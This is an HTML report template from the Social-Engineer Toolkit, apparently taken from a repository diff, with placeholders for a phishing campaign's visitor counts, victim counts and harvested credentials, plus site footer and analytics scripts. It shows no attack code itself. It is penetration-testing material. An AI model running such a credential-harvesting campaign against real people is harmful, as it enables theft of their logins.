<h4 class="dates">Social-Engineer Toolkit (SET) report on REPLACEHEREDUDE</h4>
<div class="entry">
<h2>Report generated by the Social-Engineer Toolkit</h2>
<p>Welcome to the Social-Engineer Toolkit Report Generation Tool. This report should contain information obtained during a successful phishing attack and provide you with the website and all of the parameters that were harvested. Please remember that SET is open-source, free, and available to the information security community. Use this tool for good, not evil.</p>
Social Engineering is defined as the process of deceiving people into giving away access or confidential information. <br><br>Wikipedia defines it as: "is the act of manipulating people into performing actions or divulging confidential information. While similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victim."
<br><br>We consider social engineering to be the greatest risk to security.<br><br>
<p><b>Report Statistics</p>
The credential harvester keeps track of how many individuals visited a site and those who actually fell for the attack. A total number of VISITORSHERE individuals visited the site. Based on the total number of VISITORSHERE visitors, there was a total number of BITESHERE victims that successfully fell for the attack.
<br><br>
<p><b>Report Findings Below:</p><br>
<code>
If this is blank, SET did not get a successful attempt on the website, sorry hoss..
</code>
<br><br>
"It's getting harder to break in on the external perimeter and companies are getting better at application security, so the adaptation occurs towards our weakest link, the human element" -Dave Kennedy<br><br>
</div>
</div>
</div>
<br><br>
</div>
<div id="footer">
<center><span style="color: rgb(102, 102, 102);">Visit us on</span> <span style="color: rgb(70, 141, 171);">irc.freenode.net</span> <span style="color: rgb(102, 102, 102);">#backtrack-linux or #social-engineer</span></center>
<div id="copyright">
<center><a href="http://www.secmaniac.com/">© SecManiac.com All rights reserved.</a> | <a href="http://www.ticktockcomputers.com/" target="_blank">Designs by Digip</a></center>
</div>
</div>
<div id="socialmedia">
<a href="http://www.secmaniac.com/feed/"><img src="files/rss.png" alt="RSS Feed" title="RSS Feed"></a><br><br>
<a href="http://twitter.com/dave_rel1k"><img src="files/tweet.png" alt="Twitter" title="Follow Me On Twitter!"></a>
</div>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script><script src="18345832_data/ga_002.js" type="text/javascript"></script><script src="18345832_data/ga.js" type="text/javascript"></script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-12517663-3");
pageTracker._setDomainName(".secmaniac.com");
pageTracker._trackPageview();
} catch(err) {}</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script><script src="18345832_data/ga_002.js" type="text/javascript"></script><script src="18345832_data/ga.js" type="text/javascript"></script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-12517663-4");
pageTracker._trackPageview();
} catch(err) {}</script>
<!-- Dynamic page generated in 0.169 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2011-01-10 13:42:40 -->
<!-- super cache --></body></html>

13462
src/core/scapy.py Normal file
View file

File diff suppressed because it is too large Load diff

1068
src/core/set.py Executable file
View file

File diff suppressed because it is too large Load diff

1368
src/core/setcore.py Normal file
View file

File diff suppressed because it is too large Load diff

Some files were not shown because too many files have changed in this diff Show more